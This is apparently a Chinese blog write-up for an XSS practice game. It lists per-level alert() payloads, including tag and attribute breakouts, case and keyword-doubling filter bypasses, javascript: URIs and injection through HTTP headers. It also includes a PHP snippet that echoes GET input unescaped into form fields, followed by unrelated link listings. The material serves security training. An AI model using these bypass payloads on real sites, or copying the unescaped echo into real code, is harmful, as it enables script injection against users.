xss

url:http://test.ctf8.com/level1.php?name=test

小游戏payload:

  1. <script>alert("'test'")</script>
  2. "><script>alert("'test'")</script>
  3. ' onclick=alert("'test'") '
  4. " onclick=alert("'test'") "
  5. "><a href=javascript:alert("'test'")>test</a>
  6. "><scRipt>alert("'test'")</sCript>
  7. "><scriscriptpt>alert("'test'")</scriscriptpt>
  8. javascript:alert(1)
  9. javascript:alert(1)/* http://test*/
  10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
  11. Referer: test" onclick=alert("'test'") type="text
  12. User-Agent:test" onclick=alert("'test'") type="text
  13. Cookie: user=test" onclick=alert("'test'") type="text
  14. 据说是一个图片中的exif信息,但是网址已失效;
  15. level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
  16. level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
  17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
  18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
  19. flash xss
  20. flash xss

有些参数可能会隐藏哦:

源码:get.php

<?php

echo "<h2>php变量提交get参数:</h2>";

$str = $_GET["name"];

$str2 = $_GET["sex"];

echo "<h2>form表单提交get参数</h2>".'

<center>

<form id=form>

<p>姓名:</p><input name="name"  value="'.'" type="text">

<p>input通过php接收姓名参数:</p><input name="form"  value="'.$str.'" type="text">

<p>直接接收php性别参数</p><input name="form2"  value="'.$str2.'" type="text">

<input type="submit" value="提交"/>

</form>

</center>';

?>
  1. url中能看到的参数:?name=xiaoming&form=&form2=
  2. 没有在URL中显示参数:&sex=
  3. DOM不经过服务器的
  • 能显示在url中的参数中的是form表单中name属性定义的参数;php定义的需要手动添加,或者链接到form表单上;

在线编码网站:http://monyer.com/demo/monyerjs/

<embed>标签

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

AngularJS中的ng-include

  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

fath.html内容:

<head>

        <meta charset="utf-8">

        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>

</head>

<body>

    <div ng-include="'son.html'"></div>

    <!-- 路径里面必须带上单引号 -->

    <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错-->

</body>

son.html内容:

Hello world

数据一次完整的编码解码过程:

xss小游戏通关的更多相关文章

  1. XSS小游戏通关Writeup

    源码下载:https://files.cnblogs.com/files/nul1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我也没啥可 ...

  2. XSS----payload,绕过,xss小游戏记录

    一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码. 1.xss实例代码: test.html <!DOCTYPE h ...

  3. xss小游戏源码分析

    配置 下载地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip 使用:下载解压,放到www目录下(phpstudy),http服务下都 ...

  4. XSS小游戏

    第一关 直接在URL输入 ?name=<script>alert('xss')</script> 第二关 找源码,输入test,value值变为test,我们可以在输入框尝试x ...

  5. xss games20关小游戏附源代码

    1. get方式的的值直接输出来了. ?name=<script>alert(1)</script> 2. 同样没有过滤,不过需要闭合前边的双引号和>. "&g ...

  6. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  7. Monyer.cn黑客小游戏

    花了一天的时间,Monyer给大家带来了一个有趣的东东——拥有15个关卡的黑客小游戏. 入口http://monyer.com/game/game1 因为一直以来都是大家跟我一起学习网络技术嘛,所以这 ...

  8. Javascript贪食蛇小游戏

    试玩:http://hovertree.com/game/9/ 贪吃蛇是一种风靡全球的小游戏,就是一条小蛇,不停地在屏幕上游走,吃各个方向出现的蛋,越吃越长.只要蛇头碰到屏幕四周,或者碰到自己的身子, ...

  9. 【python游戏编程之旅】第九篇---嗷大喵快跑小游戏开发实例

    本系列博客介绍以python+pygame库进行小游戏的开发.有写的不对之处还望各位海涵. 前几期博客我们一起学习了,pygame中的冲突检测技术以及一些常用的数据结构. 这次我们来一起做一个简单的酷 ...

随机推荐

  1. 操作系统-进程(3)Linux下的进程相关命令

    操作系统给予这个内存中的单元一个标识符(PID)依据登入者的UID/GID(/etc/passwd) 衍生出的其它程序(子程序),一般情况也,也会沿用这个程序(父程序)的相关权限 ParentID(P ...

  2. 第一篇 Scrum冲刺博客

    一.Alpha任务认领 冯荣新 任务 预计时间 搜索框 0.5h 首页轮播图 0.5h 分类导航 2h 商品列表 2h 商品详情轮播图 0.5h 商品底部工具栏 1h 购物车列表 1.5h 购物车工具 ...

  3. Java动态代理(三)——Cglib动态代理

    一.Cglib动态代理Cglib是一个优秀的动态代理框架,它的底层使用ASM在内存中动态的生成被代理类的子类,使用Cglib即使代理类没有实现任何接口也可以实现动态代理功能.而且,它的运行速度要远远快 ...

  4. webgl实现径向模糊

    径向模糊简介 径向模糊,是一种从中心向外呈幅射状,逐渐模糊的效果. 因此径向模糊经常会产生一些中心的发散效果,在PS中同样也有径向模糊的滤镜效果. 径向模糊通常也称为变焦模糊.径向模糊(Radial ...

  5. JavaSE基础--part1

    Java特性和优势 简单.面向对象.可移植性.高性能.分布式.动态性.多线程.安全性.健壮性 Java的三大版本 JavaSE 标准版(应用于桌面程序,控制台开发) JavaME 嵌入式开发(手机,小 ...

  6. 什么类型网站不利于seo优化

    http://www.wocaoseo.com/thread-3-1-1.html     什么样的网站不利于优化?如何让别人找到你的产品或者服务?很多人以为只要做个网站放在网上就行,但是后来发现,网 ...

  7. 项目介入EF Core

    目前.Net主流的ORM有SqlSugar.Entity Framework.Dapper,其它的我就不列举了.其实和Java那边ibatis相比,他们都比较轻量.之前用ibatis开发,真的很麻烦, ...

  8. js区别对象和数组的三种方法

    var arr = {}||[];            区分arr是数组还是对象            1.arr.constructor                              ...

  9. 备份etc下的内容

    echo "start backup..."sleep 3cp -av /etc/ /data/etc`date +%F`/echo "end backup"~ ...

  10. kotlin 作用域函数 : let、run、with、apply、 also、takeIf、takeUnless

    1.官方文档 英文: https://kotlinlang.org/docs/reference/scope-functions.html 中文: https://www.kotlincn.net/d ...